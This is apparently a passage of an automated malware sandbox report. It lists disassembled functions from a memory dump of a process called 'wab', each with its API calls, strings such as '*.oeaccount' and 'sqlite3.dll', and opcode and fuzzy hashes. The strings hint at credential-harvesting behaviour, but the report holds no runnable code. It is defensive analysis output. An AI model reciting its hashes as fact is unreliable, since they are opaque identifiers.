                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D311FAB5900208AFDB00DFA9D8849EEBBFCFB49314B10406AEA05E7201D774DA45CFA4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 203655857-0
                                                                                                                                                                                                                          • Opcode ID: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                                                                                                                                                                                                          • Instruction ID: c6c9d64871d24126578c2fffe8df42e6a01bd33b4583c5a66007e13a3507ac6b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA018BB650030467EB21B775CC86FE773ACAB04304F04047BB656F51D3DA79E9848A6D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AB44
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AB5A
                                                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AB84
                                                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                                                          • API String ID: 3699762281-259020660
                                                                                                                                                                                                                          • Opcode ID: aa9275fcc028cffcefa48dde5847177ad6754b943bb00a3c6bf4d2e50bcd3c7a
                                                                                                                                                                                                                          • Instruction ID: 40662a85ba39df66ab9e9dfe1085b05053bd092a42c83a93ebfe6a452f4dfa53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa9275fcc028cffcefa48dde5847177ad6754b943bb00a3c6bf4d2e50bcd3c7a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501F9729001296BE720A659DC45FDA776CAF45304F0400FAB60DF3182DB749E548BA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 6e69610b48158ddd1cace260c8b8c9f990ff9e3410e7d4f8ed62e5c6a57ef570
                                                                                                                                                                                                                          • Instruction ID: 50686d444a9e23a331db2cec4592ac0caeb7afc27ca0d185df797a95cebddf31
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e69610b48158ddd1cace260c8b8c9f990ff9e3410e7d4f8ed62e5c6a57ef570
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70E0E6A170470196BA24ABBFBD55B1723ECAA84B66314092FB508D72B2DF2CD864D52C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _ultoasprintf
                                                                                                                                                                                                                          • String ID: %s %s %s
                                                                                                                                                                                                                          • API String ID: 432394123-3850900253
                                                                                                                                                                                                                          • Opcode ID: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                                                                                          • Instruction ID: 4eecb7ebe0e72788cc5a9ba801a24b7f953e3738518a64b6aa949e1543d7b5d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD41C431804A1987D538D5B4878DBEB62A8A702304F5504BFEC9AB32D1D7FCAE45866E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                                                            • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                                                            • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                                                            • Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$??3@$??2@CloseCreateHandleReadSize
                                                                                                                                                                                                                          • String ID: C@
                                                                                                                                                                                                                          • API String ID: 1449862175-3201871010
                                                                                                                                                                                                                          • Opcode ID: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                                                                                          • Instruction ID: 7447114fd14c0d02a0ee842544e77a6286768af896f3cc7789f687588c6d710a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88018871C04118AFDB00AF65DC45A8F7FB8DF05364F11C166F855B7191DB349A05CBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409682
                                                                                                                                                                                                                          • SendMessageA.USER32(5\@,00001019,00000000,?), ref: 004096B0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                                                          • String ID: 5\@
                                                                                                                                                                                                                          • API String ID: 568519121-3174280609
                                                                                                                                                                                                                          • Opcode ID: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                                                          • Instruction ID: d98da3e135da4b1536afdd38015dbf476e5e9df788621b23f2aabad48e216af8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F901D679810204EBDB209F85C881EBBB7F8FF84745F10482AE840A6291D3359D95CB79
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscpy
                                                                                                                                                                                                                          • String ID: L$ini
                                                                                                                                                                                                                          • API String ID: 714388716-4234614086
                                                                                                                                                                                                                          • Opcode ID: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                                                          • Instruction ID: f535223de382355a817e33459d0294d4a206ca3c03f6505affaa6c17102478c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE01B2B1D10218AFDF40DFA9D845ADEBBF4BB08348F14812AE515E6240EBB895458F99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • failed memory resize %u to %u bytes, xrefs: 00411074
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _msizerealloc
                                                                                                                                                                                                                          • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                          • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                          • Opcode ID: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                                                          • Instruction ID: 1811babadabc61a025a406b62bb89d9ddf1cf6d87da65dd644d5d85db6a8a765
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12D0C23290C2207EEA122644BC06A5BBB91DF90370F10C51FF618951A0DA3A8CA0638A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                                            • Part of subcall function 00408C8C: GetMenuItemCount.USER32(?), ref: 00408CA2
                                                                                                                                                                                                                            • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408CC6
                                                                                                                                                                                                                            • Part of subcall function 00408C8C: GetMenuItemInfoA.USER32(?), ref: 00408CFC
                                                                                                                                                                                                                            • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408D29
                                                                                                                                                                                                                            • Part of subcall function 00408C8C: strchr.MSVCRT ref: 00408D35
                                                                                                                                                                                                                            • Part of subcall function 00408C8C: _mbscat.MSVCRT ref: 00408D90
                                                                                                                                                                                                                            • Part of subcall function 00408C8C: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00408DAC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                          • String ID: menu_%d
                                                                                                                                                                                                                          • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                          • Opcode ID: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                                                          • Instruction ID: fc9d5e34a24bd2be33db7f468ba420a1802cee0dbde2c18454a4e056650a0418
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96D0C23064174022FB3023266D0EF4B29595BC3B47F1400AEF400B10D2CBBC400486BE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104), ref: 00406D3F
                                                                                                                                                                                                                          • strrchr.MSVCRT ref: 00409579
                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040958E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                                                          • API String ID: 3334749609-1948609170
                                                                                                                                                                                                                          • Opcode ID: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                                                                                          • Instruction ID: 2d2b68270352c45da0ce721119a0fec427a5e2ae0c2a4fc26ba4743072087242
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C080521466A024F1173222AD03B4F05844F5370CF25005BFD01351C3EF9D453141FF
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                                            • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                                                            • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                                          • String ID: sqlite3.dll
                                                                                                                                                                                                                          • API String ID: 1983510840-1155512374
                                                                                                                                                                                                                          • Opcode ID: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                                                                                          • Instruction ID: b4f080e30331be102d7f345a143f57ec91a882a22c28ed8e87256c61ce2af050
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3C0803240513125BB0177717C028AF7D48DF82394B01046EF58561111DD694D3255EB
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileString
                                                                                                                                                                                                                          • String ID: 34@$Server Details
                                                                                                                                                                                                                          • API String ID: 1096422788-1041202369
                                                                                                                                                                                                                          • Opcode ID: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                                                                                                                                                                                                          • Instruction ID: 5dc36b059aaaf95d4d37dbe6dd28276a8f332030ee7f3b0879c7395586969e1a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFC04C36948B01BBDE029F909D05F1EBE62BBA8B01F504519F285210AB82754524EB26
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                                          • Opcode ID: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
                                                                                                                                                                                                                          • Instruction ID: 1cbfd9147006f86015284e0c7f96a5a033359537089e49602f9f07bbf2bf02d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B761DE72604702AFDB20DF65E981A6BB7E4FF44304F44492EFA5982250D738ED54CBDA
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3110682361-0
                                                                                                                                                                                                                          • Opcode ID: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                                                                                                                                                                                                          • Instruction ID: 82d09d3ec766172f421874171fbd662b4eebf604b8883e80537bb62e226e9057
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0631F832D0011D9BDF10DB64CD81BDEBBB8EF55314F1005BAE984B7281DA799E85CB94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3510742995-0
                                                                                                                                                                                                                          • Opcode ID: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
                                                                                                                                                                                                                          • Instruction ID: c59a560e0875e34eddc7238b356bca14a42e0d2f6379eea325777a24e0ec34d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E11E6B7D00618ABDB01DFA4DC899DEB7ACEB49310F414836FA05CB140E634E2488799
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                                          • Opcode ID: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                                                                                                                                                                                                          • Instruction ID: 34b624653e935ab7e36b2538589d62cee4ebe89d27a66743b3a416ac641d4af2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8321B3B5A65300CEE7559F6A9845915FBE4FF90310B2AC8BF9218DB2B2D7B8C8408B15
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%